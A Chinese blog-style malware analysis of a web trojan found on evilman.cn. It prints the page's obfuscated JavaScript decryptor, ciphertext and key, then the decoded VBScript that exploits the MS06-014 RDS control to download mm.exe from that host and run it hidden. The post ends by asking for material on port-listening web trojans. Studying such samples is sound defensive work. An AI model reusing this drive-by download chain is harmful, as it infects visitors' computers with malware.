今天一个网站,忽然防火墙就提示有网页木马。恼火,决定看一下到底利用了什么漏洞?
首先记下网页地址:
http://evilman.cn/1.htm
先关掉所有浏览器,然后关闭防火墙,打开记事本,CTRL+O,打开这个网页(记事本只显示源码,不会执行其中的脚本),看到如下源码:

<SCRIPT LANGUAGE="JavaScript">
<!--

/**
 * Decodes a hex-encoded message produced by the matching encoder.
 *
 * The last 8 hex digits of `str` are a salt. The password's character codes,
 * concatenated as decimal digits and extended with the salt, seed a linear
 * congruential generator (multiplier and increment derived from that digit
 * string, modulus 2^31-1). Each output character is one hex pair of the body
 * XORed with the generator's current value scaled to 0..255.
 *
 * @param {string} str - hex body followed by an 8-hex-digit salt
 * @param {string} pwd - password used to seed the generator
 * @returns {string|undefined} the decoded text, or undefined (after an alert)
 *   when the input is shorter than the salt or the password is empty
 */
function decrypt(str, pwd) {
  if (str == null || str.length < 8) {
    alert("A salt value could not be extracted from the encrypted message because it's length is too short. The message cannot be decrypted.");
    return;
  }
  if (pwd == null || pwd.length <= 0) {
    alert("Please enter a password with which to decrypt the message.");
    return;
  }

  // Seed digits: the decimal character codes of the password, concatenated.
  var seed = "";
  for (var k = 0; k < pwd.length; k++) {
    seed += pwd.charCodeAt(k).toString();
  }

  // Generator parameters are picked out of the seed digit string.
  var step = Math.floor(seed.length / 5);
  var mult = parseInt(seed.charAt(step) + seed.charAt(step * 2) + seed.charAt(step * 3) + seed.charAt(step * 4) + seed.charAt(step * 5));
  var incr = Math.round(pwd.length / 2);
  var modu = Math.pow(2, 31) - 1;

  // Split the trailing 8-hex-digit salt off the body and append it (as
  // decimal digits) to the seed.
  var salt = parseInt(str.substring(str.length - 8, str.length), 16);
  var body = str.substring(0, str.length - 8);
  seed += salt;

  // Fold the digit string down to at most 10 digits by summing 10-digit chunks.
  while (seed.length > 10) {
    var head = parseInt(seed.substring(0, 10));
    var tail = parseInt(seed.substring(10, seed.length));
    seed = (head + tail).toString();
  }

  // First generator state; `seed` is still a string and is coerced here.
  var prand = (mult * seed + incr) % modu;
  var out = "";
  for (var pos = 0; pos < body.length; pos += 2) {
    var mask = Math.floor((prand / modu) * 255);
    var code = parseInt(body.substring(pos, pos + 2), 16) ^ mask;
    out += String.fromCharCode(code);
    prand = (mult * prand + incr) % modu;
  }
  return out;
}
// Download URL consumed by the decoded payload (the decrypted VBScript later
// on this page does `x.Open str6, dl, False`). Assigned without `var`, so it
// is an implicit global and stays reachable from the injected script.
dl = "http://evilman.cn/mm.exe"
// Ciphertext for decrypt(): the \x escapes merely spell out the hex digits
// ("F8D2BF5D...") followed by the 8-digit salt. The breaks inside the literal
// appear to be page wrapping rather than part of the original script.
var WangLuoQianJu="\x46\x38\x44\x32\x42\x46\x35\x44\x32\x34\x41\x32\x35\x41\x42\x34\x46\x36\x33\x37\x32\x43\x42\x33\x42\x30\x43\x33\x34\x43\x32\x41\x35\x46\x37\x33\x30\x39\x32\x38\x32\x33\x46\x45\x39\x30\x42\x34\x33\x34\x33\x38\x39\x37\x30\x34\x38\x38\x39\x36\x35\x36\x45\x30\x39\x35\x33\x42\x41\x31\x34\x32\x43\x45\x45\x42\x37\x39\x38\x35\x32\x30\x44\x42\x35\x31\x31\x31\x42\x33\x31\x32\x44\x43\x37\x38\x42\x46\x32\x36\x44\x36\x45\x45\x46\x37\x44\x35\x39\x41\x45\x41\x35\x30\x35\x34\x43\x37\x32\x44\x33\x31\x36\x37\x38\x37\x33\x33\x30\x30\x35\x41\x44\x46\x30\x44\x41\x31\x35\x38\x32\x39\x43\x34\x44\x32\x32\x44\x31\x42\x33\x42\x45\x36\x45\x31\x34\x38\x36\x37\x38\x41\x34\x34\x31\x33\x37\x46\x38\x38\x42\x30\x35\x31\x46\x44\x38\x41\x37\x39\x33\x31\x43\x34\x42\x33\x44\x38\x37\x31\x38\x31\x45\x43\x35\x32\x39\x44\x34\x35\x37\x42\x30\x36\x44\x42\x31\x44\x30\x33\x41\x46\x34\x45\x34\x34\x38\x38\x30\x31\x45\x33\x35\x42\x31\x41\x30\x46\x37\x37\x37\x37\x31\x42\x42\x31\x46\x36\x33\x39\x46\x41\x33\x42\x39\x44\x32\x44\x31\x46\x38\x46\x39\x30\x34\x44\x43\x31\x32\x46\x45\x39\x38\x37\x35\x35\x37\x33\x41\x35\x35\x43\x30\x42\x30\x33\x39\x34\x43\x39\x44\x33\x31\x30\x46\x30\x37\x33\x42\x46\x38\x41\x31\x32\x35\x32\x46\x37\x44\x36\x36\x44\x33\x33\x39\x43\x34\x33\x46\x45\x43\x33\x41\x33\x34\x41\x32\x35\x30\x45\x46\x46\x38\x30\x45\x31\x31\x34\x39\x30\x41\x42\x45\x31\x33\x31\x31\x35\x39\x36\x45\x36\x30\x42\x41\x43\x34\x32\x42\x41\x32\x33\x38\x42\x36\x41\x43\x44\x33\x37\x35\x38\x42\x31\x31\x37\x38\x42\x30\x44\x36\x46\x30\x32\x35\x45\x32\x35\x36\x44\x46\x32\x45\x35\x32\x46\x33\x31\x39\x32\x42\x30\x37\x41\x33\x31\x39\x42\x33\x36\x42\x38\x31\x44\x37\x34\x32\x39\x37\x36\x35\x45\x43\x32\x34\x38\x35\x32\x39\x39\x36\x31\x37\x30\x41\x44\x31\x33\x37\x37\x39\x45\x32\x36\x41\x43\x38\x38\x41\x36\x35\x42\x45\x42\x41\x34\x44\x31\x43\x38\x35\x30\x32\x33\x34\x36\x33\x45\x33\x41\x30\x38\x46\x41\x37\x31\x30\x34\x44\x43\x36\x39\x34\x44\x30\x41\x36\x35\x36\x33\x36\x32\x45\x41\x41\x43\x41\x34\x41\x31\x41\x41\x37\x33\x45\
x43\x34\x43\x42\x43\x34\x32\x38\x36\x43\x31\x36\x41\x31\x45\x35\x32\x33\x37\x39\x37\x46\x41\x31\x35\x41\x34\x43\x34\x46\x33\x37\x42\x39\x33\x43\x37\x39\x30\x39\x46\x41\x37\x30\x38\x44\x30\x35\x39\x45\x32\x35\x33\x32\x44\x44\x34\x44\x30\x38\x34\x44\x43\x37\x45\x31\x30\x45\x46\x32\x31\x31\x45\x31\x43\x41\x39\x45\x43\x46\x36\x39\x32\x43\x41\x36\x32\x32\x34\x35\x45\x34\x45\x36\x43\x41\x39\x31\x43\x42\x33\x43\x44\x42\x34\x37\x33\x42\x33\x46\x33\x36\x36\x36\x42\x45\x38\x35\x36\x32\x32\x36\x46\x45\x30\x35\x41\x45\x41\x46\x45\x43\x30\x33\x45\x37\x41\x30\x34\x46\x35\x36\x43\x36\x42\x44\x36\x41\x38\x35\x30\x44\x46\x33\x34\x41\x36\x35\x38\x32\x34\x33\x36\x30\x46\x39\x32\x35\x30\x32\x41\x44\x34\x31\x34\x32\x38\x31\x45\x30\x33\x44\x45\x33\x33\x44\x43\x35\x43\x43\x36\x42\x35\x46\x33\x32\x46\x37\x30\x34\x35\x35\x37\x44\x42\x46\x32\x32\x37\x35\x42\x30\x42\x34\x43\x37\x43\x35\x39\x37\x46\x36\x41\x45\x42\x38\x42\x45\x42\x30\x46\x42\x34\x33\x37\x38\x38\x32\x32\x34\x45\x39\x32\x46\x43\x46\x35\x43\x37\x42\x35\x42\x30\x43\x39\x33\x42\x30\x36\x38\x32\x41\x32\x39\x36\x31\x30\x39\x34\x33\x44\x35\x32\x30\x46\x38\x32\x30\x30\x45\x46\x41\x38\x38\x44\x43\x37\x39\x42\x36\x41\x33\x31\x44\x35\x36\x30\x31\x30\x41\x39\x42\x46\x41\x37\x45\x36\x38\x37\x33\x30\x34\x37\x39\x45\x41\x44\x45\x31\x34\x46\x36\x32\x36\x41\x41\x34\x34\x34\x45\x46\x36\x36\x44\x39\x39\x35\x39\x31\x31\x41\x31\x38\x32\x44\x38\x31\x45\x30\x39\x36\x31\x34\x44\x44\x30\x39\x44\x45\x31\x30\x43\x35\x45\x30\x36\x38\x43\x30\x34\x32\x31\x33\x46\x35\x45\x45\x44\x44\x36\x39\x32\x36\x34\x37\x44\x41\x35\x37\x45\x41\x37\x42\x37\x41\x43\x45\x36\x38\x31\x42\x43\x41\x41\x34\x45\x37\x46\x45\x45\x44\x33\x41\x34\x35\x38\x46\x32\x38\x43\x31\x31\x34\x45\x39\x39\x39\x34\x34\x34\x43\x32\x33\x39\x33\x41\x38\x33\x45\x32\x34\x39\x41\x37\x33\x33\x39\x32\x34\x39\x39\x46\x37\x31\x35\x46\x38\x43\x30\x33\x39\x45\x33\x41\x33\x32\x39\x31\x41\x45\x31\x36\x41\x31\x34\x46\x32\x32\x30\x42\x34\x44\x34\x31\x38\x30\x38\x43\x38\x35\x32\x41\x34\x41\x35\x44\x42\x44\x45\x45\
x32\x43\x44\x41\x41\x30\x39\x44\x30\x37\x44\x32\x44\x30\x46\x46\x44\x34\x39\x36\x41\x35\x33\x36\x37\x39\x37\x35\x46\x34\x30\x31\x42\x39\x33\x33\x32\x30\x37\x34\x37\x39\x35\x43\x41\x43\x41\x44\x34\x38\x46\x38\x35\x41\x31\x33\x37\x33\x42\x41\x38\x33\x44\x38\x34\x30\x39\x46\x39\x44\x41\x44\x41\x42\x38\x37\x37\x43\x44\x37\x44\x33\x42\x34\x35\x42\x36\x32\x41\x30\x30\x45\x32\x42\x37\x34\x42\x39\x42\x33\x39\x43\x32\x39\x38\x39\x38\x43\x38\x42\x39\x34\x38\x31\x33\x43\x42\x45\x43\x43\x41\x43\x37\x36\x38\x42\x44\x31\x43\x39\x41\x45\x31\x33\x42\x43\x45\x36\x44\x39\x44\x35\x32\x34\x39\x36\x45\x33\x42\x37\x38\x46\x35\x44\x35\x41\x30\x45\x32\x30\x43\x45\x33\x31\x46\x36\x44\x33\x46\x33\x41\x43\x46\x35\x30\x33\x30\x37\x43\x34\x44\x44\x44\x42\x30\x38\x34\x39\x32\x38\x37\x39\x31\x39\x42\x33\x35\x41\x32\x46\x43\x36\x46\x38\x41\x33\x45\x33\x37\x46\x34\x36\x45\x30\x44\x31\x41\x39\x31\x44\x44\x32\x35\x44\x43\x34\x45\x36\x37\x46\x46\x38\x42\x30\x34\x41\x35\x38\x45\x30\x35\x46\x45\x45\x30\x41\x46\x39\x32\x30\x30\x41\x30\x45\x38\x35\x35\x41\x45\x38\x46\x33\x30\x37\x39\x46\x43\x31\x30\x44\x32\x34\x46\x43\x45\x32\x38\x36\x37\x34\x45\x44\x43\x32\x42\x46\x41\x42\x34\x35\x46\x31\x41\x32\x45\x31\x38\x35\x30\x44\x32\x38\x44\x46\x30\x36\x44\x36\x36\x42\x42\x36\x43\x43\x33\x39\x46\x35\x36\x37\x41\x35\x41\x46\x43\x42\x46\x31\x34\x42\x37\x39\x30\x34\x34\x34\x34\x35\x43\x42\x30\x34\x36\x38\x43\x45\x42\x34\x35\x38\x44\x42\x41\x42\x39\x36\x34\x39\x33\x38\x35\x38\x33\x38\x31\x43\x44\x38\x35\x31\x37\x39\x35\x39\x42\x34\x43\x42\x30\x35\x46\x33\x37\x33\x41\x33\x42\x30\x33\x44\x42\x36\x36\x46\x41"
// Decodes the blob with the hard-coded password and writes the result straight
// into the page, so the browser parses and runs whatever it decodes to. This
// "decrypt + document.write" shape is the part worth matching in content
// filters; the constant password makes the blob fully recoverable offline.
document.write(decrypt(WangLuoQianJu,"3800"))
//-->
</SCRIPT>


有一段加密的数据,不过已经给出了解密算法和密码,我们修改一下,然后看看这段加密的内容到底是什么脚本:
修改最后的


.

document.write(decrypt(WangLuoQianJu,"3800"))
//-->
</SCRIPT>

更改为:


//-->
</SCRIPT>
<textarea id="tbSrc" style="width:100%;height:300px">
</textarea>


<script type="text/javascript">
// Show the decoded text in the textarea's value instead of document.write,
// so the page displays the script without the browser executing it.
var box = document.getElementById("tbSrc");
box.value = decrypt(WangLuoQianJu, "3800");

</script>

然后运行一下:我们在文本框中看到真实的病毒脚本:

<script language="VBScript">
' Decoded second stage. It is the MS06-014 (msadco.dll) pattern the write-up
' names below: spawn COM objects through the vulnerable control, fetch `dl`
' over HTTP, write the body to the temp folder, then launch it. Installing
' the MS06-014 update (or setting the kill-bit on the CLSID) breaks the first
' step, which everything after it depends on.
on error resume next
' Ignore every error so a partial failure stays silent.
Set df = document.createElement("object")
' Instantiate the vulnerable MDAC RDS control by CLSID; its CreateObject is
' what lets a web page create arbitrary COM objects.
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
' HTTP client created through the control rather than directly.
Set x = df.CreateObject(str,"")
' "Adodb.Stream" is assembled from fragments, presumably to dodge plain
' string matching on the ProgID.
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
' Binary stream (adTypeBinary = 1) for the downloaded bytes.
S.type = 1
str6="GET"
' `dl` is the implicit global set by the outer page script; the request is
' synchronous (False).
x.Open str6, dl, False
x.Send
' Dropped-file name; together with the URL above it is the IoC to look for.
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
' GetSpecialFolder(2) is the user's temp folder.
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
' 2 = overwrite an existing file.
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
' Launch the dropped file with a hidden window (last argument 0).
Q.ShellExecute fname1,"","","open",0
</script>

看到了
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36吧,原来是
MS06-014: msadco.dll 严重漏洞。后面还利用了 XMLHTTP 来下载木马,用 FileSystemObject 来保存文件,用 Shell.Application 来运行木马。
真相大白。我一直想知道那种利用网页直接开端口监听的网页木马是如何做的,谁能给我点资料呀?